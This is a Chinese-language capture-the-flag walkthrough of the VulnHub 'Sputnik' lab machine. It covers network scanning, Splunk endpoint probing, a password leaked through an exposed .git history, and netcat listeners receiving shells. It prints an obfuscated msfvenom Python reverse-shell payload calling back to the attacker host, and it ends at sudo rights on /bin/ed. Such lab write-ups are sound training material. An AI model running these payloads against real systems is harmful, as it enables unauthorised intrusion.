Sputnik

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ sudo netdiscover -i eth1

Currently scanning: 192.168.90.0/16   |   Screen View: Unique Hosts        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:d0:94:27      1      60  PCS Systemtechnik GmbH   
 192.168.56.135  08:00:27:d8:0b:51      1      60  PCS Systemtechnik GmbH 

利用netdiscover工具识别目标主机的IP地址为192.168.56.135

NMAP 扫描

─$ sudo nmap -sS -sV -sC -p- 192.168.56.135 -oN nmap_full_scan
sudo: unable to resolve host kali: Temporary failure in name resolution
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 02:32 EDT
Nmap scan report for bogon (192.168.56.135)
Host is up (0.000069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
8089/tcp  open  ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after:  2022-03-28T11:03:21
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
55555/tcp open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
| http-git: 
|   192.168.56.135:55555/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
61337/tcp open  http     Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://bogon:61337/en-US/account/login?return_to=%2Fen-US%2F
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.68 seconds

从NMAP扫描结果来看，目标主机运行服务与Splunk有关，一款日志分析和数据分析系统。

信息收集

对所发现的端口依次进行分析，先访问一下8089端口，由于nmap扫描时就知道目标在该端口有SSL层

─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl --help all | grep secure 
     --doh-insecure       Allow insecure DoH server connections
 -k, --insecure           Allow insecure server connections
     --proxy-insecure     Do HTTPS proxy connections without verifying the proxy
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/ -k 
<?xml version="1.0" encoding="UTF-8"?>
<!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-->
<?xml-stylesheet type="text/xml" href="/static/atom.xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:s="http://dev.splunk.com/ns/rest">
  <title>splunkd</title>
  <id>https://192.168.56.135:8089/</id>
  <updated>2022-10-27T15:16:51+00:00</updated>
  <generator build="962d9a8e1586" version="7.2.5.1"/>
  <author>
    <name>Splunk</name>
  </author>
  <entry>
    <title>rpc</title>
    <id>https://192.168.56.135:8089/rpc</id>
    <updated>1970-01-01T00:00:00+00:00</updated>
    <link href="/rpc" rel="alternate"/>
  </entry>
  <entry>
    <title>services</title>
    <id>https://192.168.56.135:8089/services</id>
    <updated>1970-01-01T00:00:00+00:00</updated>
    <link href="/services" rel="alternate"/>
  </entry>
  <entry>
    <title>servicesNS</title>
    <id>https://192.168.56.135:8089/servicesNS</id>
    <updated>1970-01-01T00:00:00+00:00</updated>
    <link href="/servicesNS" rel="alternate"/>
  </entry>
  <entry>
    <title>static</title>
    <id>https://192.168.56.135:8089/static</id>
    <updated>1970-01-01T00:00:00+00:00</updated>
    <link href="/static" rel="alternate"/>
  </entry>
</feed>

从上述返回结果看有3个链接，依次访问这些链接

─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/rpc -k 
Invalid request                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/services -k 
<?xml version="1.0" encoding="UTF-8"?>
<response>
  <messages>
    <msg type="ERROR">Unauthorized</msg>
  </messages>
</response>
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/servicesNS -k 
<?xml version="1.0" encoding="UTF-8"?>
<response>
  <messages>
    <msg type="ERROR">Unauthorized</msg>
  </messages>
</response>
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/static -k     
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

接下来看一下目标主机上55555端口

根据nmap扫描结果55555端口下游个/.git目录

──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ gobuster dir -u http://192.168.56.135:55555 -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.135:55555
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/27 02:39:30 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 305]

===============================================================
2022/10/27 02:39:56 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ dirb http://192.168.56.135:55555

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct 27 02:40:27 2022
URL_BASE: http://192.168.56.135:55555/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                             GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.135:55555/ ----
                                                                             + http://192.168.56.135:55555/.git/HEAD (CODE:200|SIZE:23)                  
+ http://192.168.56.135:55555/index.html (CODE:200|SIZE:7834)               
+ http://192.168.56.135:55555/server-status (CODE:403|SIZE:305)             

-----------------
END_TIME: Thu Oct 27 02:40:29 2022
DOWNLOADED: 4612 - FOUND: 3

目录扫描工具也证实了NMAP扫描结果

─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl http://192.168.56.135:55555/.git/HEAD
ref: refs/heads/master

┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl http://192.168.56.135:55555/.git/logs/HEAD
0000000000000000000000000000000000000000 21b4eb398bdae0799afbbb528468b5c6f580b975 root <root@sputnik.(none)> 1553864873 +0000        clone: from https://github.com/ameerpornillos/flappy.git

发现了一个clone交流

─(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ git log -p
diff --git a/secret b/secret
new file mode 100644
index 0000000..f438519
--- /dev/null
+++ b/secret
@@ -0,0 +1 @@
+sputnik:ameer_says_thank_you_and_good_job

发现了sputnik的密码

利用用户名和密码登录

─(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ ls 
index.html  README.md  sheet.png  splunk_shells-1.2.tar.gz  sprite.js

─(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ sudo nc -nlvp 5555                                         
sudo: unable to resolve host kali: Temporary failure in name resolution
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 47694
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'

发现目标执行上述命令后夯住了，不能进入交互式shell

用msfvenom创建另一个shell

─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.101 lport=6666 R

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 605 bytes
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguNTYuMTAxIiAgICA7ICAgICAgcG9ydD02NjY2ICAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDApICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDEpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"

┌──(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Temporary failure in name resolution
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 48408
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguNTYuMTAxIiAgICA7ICAgICAgcG9ydD02NjY2ICAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDApICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDEpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"

──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ sudo nc -nlvp 6666             
sudo: unable to resolve host kali: Temporary failure in name resolution
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 53886
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job

Matching Defaults entries for splunk on sputnik:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User splunk may run the following commands on sputnik:
    (root) /bin/ed

此时可以利用Python spawn一个交互式shell了

然后看一下sudo -l

发现/ed可以利用